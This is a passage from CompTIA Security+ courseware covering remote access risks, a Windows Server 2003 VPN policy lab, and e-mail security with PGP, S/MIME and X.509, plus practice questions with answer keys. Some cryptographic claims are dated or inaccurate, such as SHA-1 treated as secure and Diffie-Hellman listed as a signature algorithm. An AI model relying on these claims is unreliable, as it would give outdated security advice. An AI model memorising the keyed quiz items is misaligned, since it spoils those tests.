                  businesses. Unlike passwords that change regularly, certificate pass-phrases can be valid
                  for a year or more.

                  War dialing
                  War dialing refers to calling a block of numbers randomly until a modem answers. If the
                  attacker finds a modem, he might use it to dial into another network to avoid long-
                  distance charges or to mask his identity during an attack.

                  Limited accounting
                  Another issue concerning remote access is the lack of auditing. A record of security,
                  system, and application events only exists on the compromised system, a serious
                  violation of the standard for event logging. The moment the VPN link is terminated, the
                  remote computer’s state cannot be guaranteed.

                  Misconfigured firewalls
                  Home systems connected to the Internet through broadband or cable modem are sharing
                  a bus with other computers in the neighborhood. This provides many opportunities for
                  an attacker to send and receive data undetected. As long as the computer is on, it’s
                  subject to attack. In addition, personal firewalls provide a false sense of security: when
                  misconfigured, they are ineffective in protecting the system against eavesdroppers and
                  hackers.

                  Solutions
                  The following recommendations will protect the remote PC against most threats:
                     • Install a personal firewall at the remote PC. Filter both incoming and outgoing
                         packets.
                      • Configure Web browsers to limit browser plugins, such as ActiveX and
                        Javascript.
                      • Make sure PC operating systems and applications have updated security patches.
                      • Use virus-scanning software and update it religiously. Set it to scan incoming e-
                        mail and attachments.
                      • Disable cookies to prevent monitoring of browser habits.
                      • Use strong passwords.
                      • Encrypt sensitive and critical information.
                  One very effective solution that circumvents all the above precautions is to provide the
                  employee with a remote session (or thin-client) solution. This eliminates the issue of
                  storing data on the remote computer. Thin clients have no local storage or functionality
                  beyond connecting to a remote session server. When the connection to the central office
                  is broken, the data stays safely at the central office.
                                                                                                  Remote access        4–29

                               Configuration of a remote access policy
                               While remote access is an essential tool for today’s businesses, it also has the potential
                               to open a wide range of security holes. One way an administrator can overcome this is
                               by using Windows Server 2003 Remote Access Policies. Remote Access Policies can
                               lock down a remote access system to ensure only those intended to have access are
                               actually granted that access.

Do it!                         D-1:     Configuring a remote access policy
                                Here’s how                                  Here’s why
For this activity, students      1 On Server-X, click Start
will work in pairs. Each
partnership will use two
machines, Server-X and
                                    Choose Administrative                   To access the Routing and Remote Access
Server-Y. Instruct                  Tools, Routing and Remote               window.
students to substitute their        Access
server’s hostname for
Server-X and their               2 Expand SERVER-X
partner’s server hostname
for Server-Y.
                                 3 Right-click Remote Access
                                    Policies

                                    Choose                                  To start the New Remote Access Policy wizard.
                                    New Remote Access Policy

                                 4 Click Next

                                 5 In the Policy name box, type
                                    Allow all users access

                                    Click Next

                                 6 Click Next                               To accept the default access method of VPN.

                                 7 Select User

                                    Click Next

                                 8 Click Next                               To accept the default authentication method.

                                 9 Click Next                               To accept the default Policy Encryption Level.

                                10 Click Finish

                                11 Double-click Remote Access               You'll see the Allow all users access policy in
                                    Policies                                the right pane.

                                12 Double-click Allow all users            To display the Properties of the remote access
                                    access                                 policy.

                                13 Select Grant remote access              Remote access policies are configured to deny
                                    permission                             rather than grant access by default.

                                    Click OK                               To save your changes.
4–30   CompTIA Security+ Certification


                   14 Close the Routing and Remote
                      Access window

                   15 Open Computer                      Windows Server 2003 does not allow dial-in
                        Management                       access by default. In order to allow remote
                                                         access to a Windows Server 2003 server, you
                                                         must configure the Remote Access Permissions
                                                         on a user-by-user basis. Administrator is an
                                                         exception to this rule; Administrator is allowed
                                                         to connect remotely by default.

                   16 Expand
                        Local Users and Groups

                        Select Users

                   17 Double-click User1

                   18 Activate the Dial-in tab

                   19 Select Control access              To change the dial-in access for User1.
                        through Remote Access
                        Policy

                        Click OK

                   20 Repeat steps 17 through 19 for
                      User2

                   21 Log on to Server-Y as User1 and    You’ll be able to connect using the remote
                      try to access the Class VPN PPTP   access policy.
                      connection

                   22 On Server-X, click Start           To start the process of disabling Routing and
                                                         Remote Access.

                        Choose Administrative
                        Tools, Routing and Remote
                        Access

                   23 Right-click Server-X

                   24 Choose Disable Routing and
                        Remote Access

                        Click Yes                        User1 is disconnected from the server when the
                                                         service is stopped.

                   25 Close all windows
                                                                         Remote access     4–31


Unit summary: Remote access
Topic A   In this topic, you learned that with the continued growth of remote access computing,
          the need for remote access security has become paramount. You learned about some of
          the challenges faced when communicating over unsecured dial-up, ISDN, DSL, and
          cable modem channels.
Topic B   In this topic, you learned about the various authentication methods used for remote
          access. You learned about the IEEE 802.1X protocol, which builds on the standards
          outlined in the Point-to-Point Protocol (PPP) and Extensible Authentication
          Protocol (EAP) to control access to the corporate network. You also learned about
          Remote Authentication Dial-in User Service (RADIUS), which uses open protocols
          to provide a centralized and scalable security system, and Terminal Access Controller
          Access Control System (TACACS+), an authentication protocol developed by Cisco
          Systems to address the need for multiprotocol support and scalability.
Topic C   In this topic, you learned about VPN technology and its tunneling protocols.
          Corporate networks use site-to-site and remote access VPNs to connect remote offices
          and users to the corporate network. Four tunneling protocols commonly used in VPN,
          Point-to-Point Tunneling Protocol (PPTP), L2TP, Secure Shell, and IPSec, use
          encapsulation and encryption to transmit sensitive data over the Internet.
Topic D   In this topic, you learned about the different vulnerabilities associated with
          telecommuting. Many large companies have begun using telecommuting as a method
          to reduce costs and improve employee satisfaction, unfortunately, the benefits gained by
          telecommuting come with the price of an increased security threat.

          Review questions
           1 PPTP is built upon _______ and ________, two well-established communications
             protocols.
              A PPP, UDP
              B   PPP, TCP/IP
              C LDAP, PPP
              D TCP/IP, UDP
           2 SSH uses a _____________ key authentication method to establish a secure
             connection.
              A Private
              B   Public
              C Encrypted
              D Skeleton
           3 The RADIUS architecture allows all information to be located on a single central
             database. True or false?
              True
4–32   CompTIA Security+ Certification

                    4 _____________ is an authentication method that was developed to address
                      scalability and connection-oriented services.
                      A 802.1X
                      B RADIUS
                      C X.25
                      D   TACACS+

                    5 IPSec uses a(n) ______________ algorithm for negotiating which keys to use for
                      symmetric encryption.
                      A   Asymmetric

                      B Symmetric
                      C Proprietry
                      D Encryption
                    6 What are the available PPTP protocol enhancements? (Choose all that apply.)
                      A PPP is multiprotocol
                      B Offers authentication
                      C Offers methods of privacy and compression of data
                      D   All of the above
                    7 RADIUS always encrypts the password in the packet. True or false?
                      True

                    8 TACACS+ separates which of the following?
                      A   Authentication, authorization, and accounting
                      B Authentication, authorization, and availability
                      C Authorization, accounting, and availability
                      D Authentication, accounting, and availability
                    9 The acronym “NAS” stands for network authentications server. True or false?
                      False: It means network access server.

                  10 Remote access logging can log which of the following events?
                      A Accounting requests
                      B Authentication requests
                      C Periodic status
                      D   All of the above
                                                   5–1


Unit 5
E-mail
         Unit time: 120 minutes

         Complete this unit, and you’ll know how to:

         A Define secure e-mail and how it works.

         B Describe the characteristics of PGP and
            S/MIME.

         C Identify and safeguard against e-mail
            vulnerabilities.
5–2           CompTIA Security+ Certification


Topic A: Secure e-mail and encryption
                         This topic covers the following CompTIA Security+ exam objective:

                          #        Objective

                          4.2      Understand how cryptography addresses the following security concepts
                                    • Confidentiality
                                    • Integrity
                                        • Digital Signatures
                                    • Authentication
                                    • Non-Repudiation
                                        • Digital Signatures




                         E-mail
Explanation              Over the course of the past decade, electronic mail has become the mission-critical
                         business application and changed the way we work forever. The result has been a
                         massive increase in productivity; however, e-mail is an incredibly vulnerable tool. For
                         the most part, it is transmitted across the Internet in plaintext so any intermediary could
                         read or modify it, and worse, anyone could set up an e-mail account and claim to be that
                         person.
                         E-mail security is not the only challenge to maintaining the utility and productivity
                         gains offered by e-mail. Floods of spam, or unrequested junk mail, are another hazard
                         that workers in the new digital office must navigate. Hoaxes further threaten to reduce
                         worker productivity and create chaos on the corporate network.
                         The technologies presented in this unit, Pretty Good Privacy (PGP) and
                         Secure/Multipurpose Internet Mail Extension (S/MIME), seek to ensure the integrity
                         and privacy of information by wrapping security measures around the e-mail data itself.
                         These two competing standards use public key encryption techniques.

                         Goals of secure e-mail
                         Secure e-mail uses cryptography to secure messages transmitted across insecure
                         networks. The advantage of e-mail encryption is that e-mail can be transmitted over
                         unsecured links without risk that the e-mail will be read or modified. Further, the e-mail
                         can be stored in encrypted form, protecting the contents from prying eyes long after it
                         has been delivered to its destination.
                         Secure e-mail provides four main features:
                                • Confidentiality — By encrypting messages, the sender and the recipient can
                                  transmit data to each other over an unsecured or monitored link (i.e., the
                                  Internet) without worrying that their communications are monitored. That is to
                                  say, secure e-mail provides a guarantee of privacy.
                                • Integrity — The communicating parties can also be sure their data has not been
                                  modified while in transit. This is a very important feature for many government
                                  and commercial applications.
                                                                                                     E-mail      5–3

                              • Authentication — Secure e-mail uses secret encryption keys that only the
                                owners know and have access to, so the recipient of the e-mail knows for a fact
                                that it was sent by the person it purports to be from.
                              • Nonrepudiation — Just as with authentication, the recipient of the message
                                knows for a fact that the message was sent by the person appearing in the
                                messages FROM: field, and that the details of the message body were received
                                as they were written. The sender cannot claim the message did not originate
                                from his or her computer or the contents of the message were changed in transit.

                          Terminology
                          The key cryptography concepts you need to understand are encryption, digital
                          signatures, and digital certificates. These concepts are covered briefly in this section so
Inform the students       you can recognize how they are used to make e-mail more secure.
that, although most of
the key terms and
concepts relating to      Encryption
cryptography are
explained in this unit,   When people think of secure e-mail, encryption is the technology that comes to mind.
they are covered in       Encryption provides privacy, integrity, authentication, and nonrepudiation. These are
depth in the
Cryptography unit.        the primary features of secure e-mail:




                          Exhibit 5-1: How conventional encryption works

                          Encryption is the conversion of data into code to make it unreadable, as shown in
                          Exhibit 5-1. It is accomplished by taking data and passing it, along with a value, called a
                          key, through an algorithm that makes the data completely unreadable. The only way to
                          recover the information is to reverse the process using the appropriate key. Even though
                          the encryption algorithm is known, without also having the key, it is impossible to
                          recover the original data.
                          The two main types of encryption are; conventional cryptography, in which the same
                          key is used for encryption and decryption, and public key cryptography, which uses a
                          publicly distributed key for encryption and a secret private key for decryption.
5–4          CompTIA Security+ Certification

                        Hash function
                        A hash function is a function that takes plaintext data of any length and creates a unique
                        fixed-length output. For example, the message could be 1 KB or 1 MB in size, but the
                        hash output on either message would be the same fixed length. The result of the hash
                        function is called a message digest. The essential principle of a cryptologically sound
                        hash function is that if the input were changed by a single bit, the message digest would
                        be different. It’s also important to remember that the original message cannot be derived
                        from the message digest; hash functions work only in one direction.
                        Two major hash functions are used today. SHA-1 (Secure Hash Algorithm 1) was
                        developed by the National Security Agency (NSA) and is considered the more secure of
                        the two commonly used algorithms. It produces 160-bit digests.
 Information about      The other common hash algorithm is MD5 (Message Digest algorithm version 5), which
 breaking MD5 can be    produces 128-bit digests. RSA Security has placed MD5 in the public domain; therefore,
 found at
 scramdisk.clara.net/   no licensing is required to use it. Cryptography experts have shown that MD5 has major
 pgpfaq.html            flaws, and it is likely that it will be broken in the future.
 #SubMD5Implic.


Do it!                  A-1:     Discussing encryption and hash functions
                          Questions and answers
                          1 What is one measure a user can use to ensure confidentiality when sending e-mail
                            messages?

                             Encrypt the messages

                          2 A message digest is the product of running a message through a hash function.
                            True or false?

                             True

                          3 Once data is encrypted, the only way to recover the information is to _____.
                             A      Attach a digital certificate
                             B      Share the private key
                             C      Pass it through a hash function
                             D      Reverse the process using the appropriate key

                          4 The hash function is a good method for determining whether a message has been
                            altered. True or false?

                             True

                          5 A hash function takes plaintext and creates a fixed-length output regardless of the
                            size of the message. True or false?

                             True
                                                                                       E-mail       5–5

              Digital signatures
Explanation   A digital signature is a digital code that can be attached to an electronic message to
              uniquely identify the sender. Digital signatures provide integrity, authentication, and
              nonrepudiation. That is, by using a digital signature, a user can receive a plaintext
              message and still know with a high degree of certainty that the message has not been
              tampered with, and indeed comes from the person it claims to be from with no
              possibility the sender could truthfully deny sending the message.
              Digital signatures are created using hash functions. You perform a hash on the message
              to create a message digest, and then you “sign” the message by encrypting the message
              digest with your own private key, as shown in Exhibit 5-2.




              Exhibit 5-2: How digital signatures are created

              When the receiver gets the message, that person can verify its integrity: the message
              digest is recreated by performing a hash on the message using the same hashing
              algorithm as the sender. The message digest is then compared against the digest that
              came with the message (after decrypting it with the sender’s public key). If the two
              versions of the digest are the same, then the message has not been altered. The fact that
              the receiver can recover the original message digest using the sender’s public key
              guarantees its authenticity and provides nonrepudiation.
5–6   CompTIA Security+ Certification

                 Digital certificates
                 A digital certificate is an attachment to an electronic message used for security
                 purposes. It provides a type of credential, much like a passport or driver’s license.
                 Digital certificates are similar to digital signatures in that a public key and private key
                 are used, but with digital certificates, there is an endorser who vouches for the
                 authenticity and identity of the public key holder. The digital certificate contains the
                 following information:
                     • The owner’s public key, which is used to encrypt messages to its owner
                     • One or more pieces of information that uniquely identify the owner (for
                       example, a name and e-mail address)
                     • The digital signature of an endorser (called the Certificate Authority), stating
                       that the public key actually belongs to the person in question
                 Exhibit 5-3 shows the structure of one major digital certificate standard, the X.509
                 certificate.




                 Exhibit 5-3: A digital certificate

                 Much like a real certificate, a digital certificate helps others to verify the owner of the
                 public key is who he says he is. This is a valuable addition to the normal features of
                 encryption. Digital certificates are designed to answer the question of whom an e-mail
                 address and public key really belong to; you don’t know, unless the sender has a digital
                 certificate and you trust the authority that signed the certificate. In the real world, you
                 might rely on a passport to authoritatively identify the person who carries it, but only
                 because you trust the government to issue the passport only to the right person. The
                 same can be said for digital certificates: the certificate is only as good as your trust for
                 the authority that issued it.
                                                                          E-mail       5–7

Combining encryption methods
PGP and S/MIME use a combination of conventional encryption and public key
encryption. For that reason, these technologies are said to be hybrid cryptosystems. The
reason for this hybrid is to overcome the shortcomings of both public key and
conventional (or symmetrical) cryptosystems.
Conventional encryption is very fast, but it uses symmetrical keys for encryption and
decryption, which is to say, both the recipient and the sender must have the same secret
key to encode and decode their messages. The problem lies in sending the secret key to
the other person without it being compromised. Worse, in order to keep your
conversations private, you need a different set of keys for every person with whom you
communicate. Conventional encryption results in what is called the key distribution problem
(the challenge of getting keys securely to their recipients).
Conversely, public key encryption is slow but has solved the problem of key
distribution. In this scheme, each person has a private key and a public key, as shown in
Exhibit 5-4.




Exhibit 5-4: How public key encryption works

The private key is used for decryption and is kept secret. The public key is used for
encryption and is freely distributed. For example, Mary’s public key is the only key that
anyone needs to encrypt a message to her. Once a message has been encrypted using
Mary’s public key, it can only be decrypted with her private key. Not even the sender
can decrypt the message once it’s been encrypted with Mary’s public key. So key
distribution is not an issue with public key technology—but the actual process of
encrypting is much, much slower.
5–8      CompTIA Security+ Certification

Do it!              A-2:      Discussing digital signatures and certificates
                      Questions and answers
                       1 Put the following steps in their proper sequence to determine whether a message
                         has been tampered with or came from someone other than the specified sender.

                          ___ The receiver compares his message digest value against the          6
                          digest that came with the message.

                          ___ The receiver decrypts the message.                                  4

                          ___ You perform a hash on the message to create a message digest.       1

                          ___ The receiver gets the message.                                      3

                          ___ Encrypt the message digest with your own private key.               2

                          ___ The receiver performs a hash on the message to create a             5
                          message digest.

                       2 Which of the following uses the same key to encrypt and decrypt?
                          A    Conventional cryptography
                          B    Traditional cryptography
                          C    Public key cryptography
                          D    Private key cryptography

                       3 Which of the following uses one key to encrypt and another to decrypt?
                          A    Conventional cryptography
                          B    Traditional cryptography
                          C    Public key cryptography
                          D    Private key cryptography

                       4 Digital signatures provide integrity, confidentiality, and authentication. True or
                         false?

                          False. They do not provide confidentiality.

                       5 Digital certificates contain which of the following types of information?
                          A    The owner’s public key
                          B    One or more pieces of information that uniquely identify the owner
                          C    The digital signature of an endorser
                          D    All of the above
                                                                     E-mail       5–9

6 A hash function takes plaintext and creates a fixed-length output regardless of the
  size of the message. True or false?

  True

7 What is the result of a hash function?
  A      Message
  B      Message digest
  C      Cipher
  D      Cipher text
5–10      CompTIA Security+ Certification

                     The encryption process
Explanation          PGP and S/MIME encryption systems follow a specific process to secure e-mail
                     messages before they are sent. The steps are:
                        1 The message is compressed (only with PGP).
                        2 A session key is created.
                        3 The message is encrypted using the session key with a symmetrical encryption
                           method.
                        4 The session key is encrypted with an asymmetrical encryption method.
                        5 The encrypted session key and the encrypted message are bound together and
                           transmitted to the recipient.
                     The same steps are used, in reverse, to decrypt the message.
                     If PGP is used, then the plaintext is compressed using the ZIP compression routines,
                     provided it is long enough and is not already compressed. The reason for this is that
                     compression adds to the cryptographic strength of the encrypted document because it
                     reduces the patterns in the plaintext. These patterns are then represented in the
                     encrypted version and are one of the primary points of cryptanalysis attack. This is the
                     same method used by commercial compression packages such as WinZip and PKZIP.
                     The e-mail encryption system creates a session key using a random number generated
                     from the user’s mouse movements and keystrokes. These inputs help to ensure that the
                     number really is random—computers have a hard time generating truly random
                     numbers on their own.
                     The plaintext is then encrypted using the session key and a conventional encryption
                     algorithm. Conventional encryption is about 1000 times faster than public key
                     encryption, so using the session key significantly speeds up the process of encrypting
                     the user’s data.
                     Notice that PGP and S/MIME use different conventional encryption systems.
                     The session key is encrypted using the recipient’s public key, as shown in Exhibit 5-5. It
                     is decrypted using the recipient’s private key. This technique leverages the speed and
                     convenience of conventional encryption, but avoids the problem of distributing
                     symmetrical keys that is inherent to conventional encryption; public key encryption
                     allows the symmetrical key to be distributed along with the cipher text.
                     The encrypted session key and the encrypted data are bound together. The encrypted
                     message might now be sent over an unsecured network or channel to the recipient
                     without fear the contents can be read or modified in transit.
                     When you receive such an encrypted message, your e-mail client unbundles the
                     encrypted message and the encrypted session key. The session key is decrypted using
                     your private key. Then the session key is used to decrypt the contents of the message, as
                     shown in Exhibit 5-6. All this happens transparently to the end-user.
                                                  E-mail   5–11




Exhibit 5-5: How secure e-mail encryption works




Exhibit 5-6: How secure e-mail decryption works
5–12     CompTIA Security+ Certification

Do it!              A-3:      Understanding the encryption process
                      Questions and answers
                       1 Put the following steps in the correct sequence to describe the encryption process.

                          ___ A session key is created.                                              2

                          ___ The message is compressed (only with PGP).                             1

                          ___ The session key is encrypted with an asymmetrical encryption           4
                          method.

                          ___ The encrypted session key and the encrypted message are bound          5
                          together and transmitted to the recipient.

                          ___ The message is encrypted using the session key with a                  3
                          symmetrical encryption method.

                       2 S/MIME compresses plaintext using ZIP compression before encrypting the
                         message. True or false?

                          False: PGP compresses the plaintext first.

                       3 In what manner does compression strengthen encryption?

                          It reduces the patterns in the plaintext.

                       4 How is the session key generated?

                          The encryption system uses a random number generated from the user’s mouse movements
                          and keystrokes.

                       5 The plain text message is encrypted using the public key to create cipher text.
                         True or false?

                          False: The plain text message is encrypted using the session key.

                       6 How is the session key protected during transmission over the Internet?

                          The session key is encrypted using the recipient’s public key.

                       7 The encrypted session key is sent in a separate message from the cipher text. True
                         or false?

                          False: It is sent with the cipher text.

                       8 The session key is decrypted using the recipient’s private key. True or false?

                          True
                                                                                                     E-mail     5–13


Topic B: PGP and S/MIME encryption
              This topic covers the following CompTIA Security+ exam objective:

               #        Objective

               2.2      Recognize and understand the administration of the following e-mail security concepts
                         • S/MIME (Secure Multipurpose Internet Mail Extensions)
                         • PGP




              Background on PGP
Explanation   PGP and S/MIME both use encryption and digital signatures to achieve the goal of
              secure e-mail, however, their formats and implementations are significantly different.
              PGP establishes authenticity through a “Web of trust” and places the responsibility of
              authentication on each user. S/MIME uses a Certificate Authority (CA) to establish
              trust. The two protocols are incompatible.
              PGP is an encryption technology that has grown up with the Internet. PGP was
              originally written by Phil Zimmerman in 1991 to fill the gap in effective, commercially
              available encryption software.
              PGP supports four major symmetric encryption methods:
                     • CAST — An algorithm for symmetric encryption named after its designers
                       (Carlisle Adams and Stafford Tavares). CAST is owned by Nortel, but available
                       to anyone on a royalty-free basis. CAST is a fast method of encrypting data and
                       has stood up to attempted cryptanalytic attacks. Cast uses a 128-bit key and has
                       no weak or semi-weak keys.
                     • International Data Encryption Algorithm (IDEA) — Originally published in
                       1992, IDEA has a decent record of withstanding attacks, and however, the fact
                       that the algorithm must be licensed from Ascom Systec has impeded its
                       adoption. IDEA uses a 128-bit key.
                     • Triple Data Encryption Standard (3DES) — Based on the DES, which uses a 56-
                       bit key, 3DES runs the same algorithm three times to overcome its short key
                       size. Although (3 x 56) bits equals 168 bits, the effective key strength of 3DES
                       is approximately 129 bits. 3DES is perhaps the industry standard algorithm for
                       encryption. 3DES is much slower than either IDEA or CAST.
                     • Twofish — One of five algorithms that were finalists to be selected for the
                       Advanced Encryption Standard (AES), Twofish was selected for inclusion into
                       PGP before the winner was announced in 2001. Although Twofish was not
                       ultimately selected to be used in the standard, it is a strong algorithm that has
                       withstood examinations by industry experts. Like all AES contestants, Twofish
                       has 128-bit, 192-bit, and 256-bit key sizes.
5–14   CompTIA Security+ Certification

                  PGP certificates
                  PGP defines its own standard for digital certificates. PGP certificates are very similar to
                  X.509 certificates in some respects but are notably more flexible and extensible.
                  One unique aspect of the PGP certificate format is that a single certificate can contain
                  multiple signatures. Several or many people might sign the key/identification pair to
                  attest to their own assurance that the public key definitely belongs to the specified
                  owner. If you look on a public certificate server, you might notice certain certificates,
                  such as that of PGP’s creator, Phil Zimmermann, contain many signatures. The table
                  below provides an outline of the PGP certificate format.

                   Certificate                            Certificate format

                   PGP version number                     Version of PGP, which was used to create the key associated with
                                                          the certificate.

                   Certificate holder’s public key        Public portion of your key pair, together with the algorithm of the
                                                          key, which is RSA, RSA Legacy, Diffie-Hellman or Digital
                                                          Signature Algorithm (DSA).

                   Certificate holder’s information       Identity information about the user, such as his or her name, user
                                                          ID, e-mail address, ICQ number, photograph, and so on.

                   Digital signature of the certificate   Signature created with the private key corresponding to the public
                   owner                                  key associated with this certificate.

                   Certificate’s validity period          Start date/time and expiration date/time—indicates when the
                                                          certificate will expire.

                   Preferred symmetric encryption         Encryption algorithm to which the certificate owner prefers to
                   algorithm for the key                  have information encrypted; the supported algorithms are CAST,
                                                          IDEA, 3DES, and Twofish.
                                                                                 E-mail     5–15

Do it!   B-1: Discussing PGP
         Questions and answers
          1 Match the following symmetric algorithms with their definition:
            CAST      IDEA     3DES      Twofish

            Offers 128-bit, 192-bit, and 256-bit keys and included in PGP in 2001         Twofish

            Uses a 128-bit key and available to anyone on a royalty-free basis            CAST

            Uses a 56-bit key but runs the same algorithm three times to produce          3DES
            an effective key strength of 129 bits

            Uses a 128-bit key and is licensed by Ascom Systec                            IDEA

          2 One unique aspect of the PGP certificate format is that a single certificate can
            contain:
            A    Single signatures
            B    Multiple signatures
            C    Multiple public keys
            D    Multiple algorithms

          3 Which of the following is contained within a PGP certificate? (Choose all that
            apply.)
            A    PGP version number
            B    Certificate holder’s private key
            C    Certificate holder’s information
            D    Digital signature of the certificate owner
            E    Preferred symmetric encryption algorithm for the key
5–16      CompTIA Security+ Certification

                     Background on S/MIME
Explanation          S/MIME is a protocol for secure electronic mail and was designed to add security to e-
                     mail messages in MIME format. The security services offered are authentication (using
                     digital signatures) and privacy (using encryption).
                     S/MIME v3 was made a standard in July, 1999, by IETF’s S/MIME Working Group.
                     The S/MIME v3 standard consists of six parts:
                         • Diffie-Hellman Key Agreement Method (RFC 2631)
                         • S/MIME Version 3 Certificate Handling (RFC 2632)
                         • S/MIME Version 3 Message Specification (RFC 2633)
                         • Enhanced Security Services for S/MIME (RFC 2634)
                         • Cryptographic Message Syntax (RFC 3369)
                         • Cryptographic Message Syntax (CMS) Algorithms (RFC 3370)

                     S/MIME encryption algorithms
                     S/MIME development began in 1995, and because of the specification needed to work
                     within U.S. government export controls which existed until recently, S/MIME
                     implementations have been required to support 40-bit RC2 (Rivest Cipher 2, a
                     symmetric encryption cipher owned by RSA Data Security), which is known to be a
                     very weak algorithm. Although 3DES is also a supported algorithm, and is in fact
                     recommended, some have criticized S/MIME for being cryptographically weak, but it is
                     only weak if a weak algorithm is chosen. The specification is very clear on the subject.
                     Forty-bit encryption is considered weak by most cryptographers. Using weak
                     cryptography in S/MIME offers little actual security over sending plaintext, however,
                     other features of S/MIME, such as the specification of 3DES and the ability to announce
                     stronger cryptographic capabilities to parties with whom you communicate, allows
                     senders to create messages that use strong encryption. (RFC 2633, page 24)
                     S/MIME recommends three symmetric encryption algorithms: DES, 3DES, and RC2.
                     The adjustable key size of the RC2 algorithm makes it useful for applications intended
                     for export outside the U.S.
                     In some environments, hiding the identity of the sender is a requirement. This is in an
                     effort to prevent traffic analysis, where an eavesdropper could gain valuable information
                     on the communicants even if the message cannot be read. To thwart this, these
                     environments use anonymous e-mailers or gateways that strip off the originating e-mail
                     address. A digital signature could give the eavesdropper another piece of data to identify
                     the sender, who is also the signer. S/MIME prevents this by applying the digital
                     signature first, and then enclosing the signature and the original message in an
                     encrypted digital envelope. In this way, no signature information is exposed to the
                     eavesdropper.

                     X.509 certificates
                     Rather than define its own certificate type as PGP does, S/MIME relies on the X.509
                     certificate standard.
                     To obtain an X.509 certificate, you must ask a certificate authority (CA) to issue one.
                     You provide your public key, proof that you possess the corresponding private key, and
                     some specific information about yourself. You then digitally sign the information and
                     send the whole package—the certificate request—to the CA. The CA then performs
                     some due diligence in verifying the information you provided is correct and, if so,
                     generates the certificate and returns it.
                                                                                           E-mail       5–17

You might think of an X.509 certificate as looking like a standard paper certificate
(similar to one you might have received for completing a class in basic first aid) with a
public key taped to it. It has your name and some information about you on it, plus the
signature of the person who issued it to you. For an outline of the contents of X.509
certificates, see the table below:

 Certificate                       Certificate format

 X.509 version                     Identifies which version of the X.509 standard applies to this certificate,
                                   which in turn determines what information can be specified in it.

 Certificate holder’s public       Public key of the certificate holder, together with an algorithm identifier
 key                               that specifies which cryptosystem the key belongs to and any associated
                                   key parameters.

 Serial number of the              Unique serial number to distinguish it from other certificates issued. This
 certificate                       information is used in numerous ways; for example, when a certificate is
                                   revoked, its serial number is placed on a certificate revocation list
                                   (CRL).

 Certificate holder’s              Intended to be unique across the Internet, a DN consists of multiple
 distinguished name (DN)           subsections and might look something like this:

                                   CN=Jonathan Public, E-MAIL=jonathanpublic@hotmail.com,
                                   OU=Security Team, O=Consulting Inc., C=US

                                   (These refer to the subject’s Common Name, Organizational Unit,
                                   Organization, and Country.)

 Certificate’s validity period     Start date/time and expiration date/time.

 Unique name of the certificate    Unique name of the entity that signed the certificate. This is normally a
 issuer                            CA. Using the certificate implies trusting the entity that signed this
                                   certificate.

 Digital signature of the issuer   Signature using the private key of the entity that issued the certificate.

 Signature algorithm identifier    Algorithm used by the CA to sign the certificate.



S/MIME trust model: certificate authorities
S/MIME was designed from the outset as a purely hierarchical model. Keys or
certificates are trusted based on the trustworthiness of the issuer, which is assumed to be
of a higher value than that of the user. The line of trust can be followed up the chain of
certificates to some root, which is generally a large commercial organization, a
certificate authority engaged purely in the business of verifying identity and assuring the
validity of keys or certificates.
5–18   CompTIA Security+ Certification

                  Differences between PGP and S/MIME
                  S/MIME 3 (the current version, which has been accepted as an IETF standard) and
                  OpenPGP (the open, standards-based version that grew out of PGP in 1997) are both
                  protocols for adding authentication and privacy to messages. They differ in many ways,
                  however, and are not designed to be interoperable. Some cryptography algorithms are
                  the same between the two protocols, but others differ. The following table provides a
                  comparison of the two protocols:

                   Features                            S/MIME 3                          OpenPGP

                   Structure of messages               Binary, based on CMS              PGP

                   Structure of digital certificates   X.509                             PGP

                   Algorithm: symmetric                3DES                              3DES
                   encryption

                   Algorithm: digital signature        Diffie-Hellman                    ElGamal

                   Algorithm: hash                     SHA-1                             SHA-1

                   MIME encapsulation for              Choice of multipart/signed or     Multipart/signed with ASCII
                   signed data                         CMS format                        armor

                   MIME encapsulation for              Application/PKCS#7-MIME           Multipart/encrypted
                   encrypted data

                   Trust model                         Hierarchical                      Web of trust

                   Marketplace adoption                Growing quickly because of        Current encryption standard
                                                       use in Microsoft and              among security professionals
                                                       Netscape browsers, e-mail
                                                       clients, and in SSL
                                                       encryption

                   Marketplace advocates               Microsoft, RSA, VeriSign          PGP, Inc., has been
                                                                                         dissolved, but some of its
                                                                                         products have been absorbed
                                                                                         into the McAffee product line

                   Ease of use                         Configuration is not intuitive,   Configuration is not intuitive,
                                                       and certificates must be          and certificates must be
                                                       obtained and installed;           created; general use is
                                                       general use is straightforward    straightforward

                   Software                            Already integrated in             PGP software must be
                                                       Microsoft and Netscape            downloaded and installed
                                                       products (both commercial
                                                       and free versions)

                   Cost of certificates                Certificates must be              PGP Certificates can be
                                                       purchased from a certificate      generated by anyone and are
                                                       authority, and they have a        free
                                                       yearly fee attached
                                                                            E-mail     5–19

 Features         S/MIME 3                                  OpenPGP

 Key              Easy, but you must trust a certificate    Harder because the user must
 management       authority                                 make decisions on the validity of
                                                            identities, but you have granular
                                                            control over whom you trust

 Compatibility    Transparently works with any vendor’s     Compatible with MIME and non-
                  MIME e-mail client, but not compatible    MIME e-mail formats, but the
                  with non-MIME e-mail formats              recipient must have PGP installed

 Centralized      Centralized management possible           Status of PGP’s centralized
 management       through public key infrastructure (PKI)   management products in doubt
                  offerings


A single e-mail client could use both S/MIME and PGP, but PGP cannot be used to
decrypt S/MIME messages and vice versa. There are many differences between an
X.509 certificate and a PGP certificate, but the most important are:
    • You can create your own PGP certificate; you must request and be issued an
      X.509 certificate from a certificate authority.
    • X.509 certificates natively support only a single name for the key’s owner,
      whereas PGP allows multiple fields to describe the key’s owner.
    • X.509 certificates support only a single digital signature to attest to the key’s
      validity, but PGP allows the inclusion of many signatures that attest to the
      validity of the key.
5–20     CompTIA Security+ Certification

Do it!              B-2:     Comparing S/MIME and PGP
                      Questions and answers
                       1 For each of the following characteristics, specify whether the protocol described is
                         S/MIME or PGP.

                          _____ Certificates support multiple signatures                            PGP

                          _____ Uses X.509 certificates                                             S/MIME

                          _____ Binds public key to digital signature of Certificate Authority      S/MIME

                          _____ Supports DES, 3DES, and RC2 algorithms                              S/MIME

                          _____ Supports CAST, IDEA, 3DES, and Twofish algorithms                   PGP

                          _____ Encrypts the digital signature                                      S/MIME

                          _____ Binds public key to digital signature of certificate owner          PGP

                          _____ Bundled with Microsoft and Netscape products                        S/MIME

                          _____ Software must be downloaded                                         PGP

                          _____ Uses a hierarchical trust model                                     S/MIME
                                                                                                         E-mail        5–21

                               Using PGP to encrypt and sign e-mail
 Explanation                   To demonstrate how PGP is installed and configured to be able to encrypt and digitally
 In previous versions of       sign e-mail, you will now work through the following steps:
 this course, a Hotmail            • Installing and configuring PGP (including generating PGP keys)
 account was used to
 exchange the public               • Exporting public keys
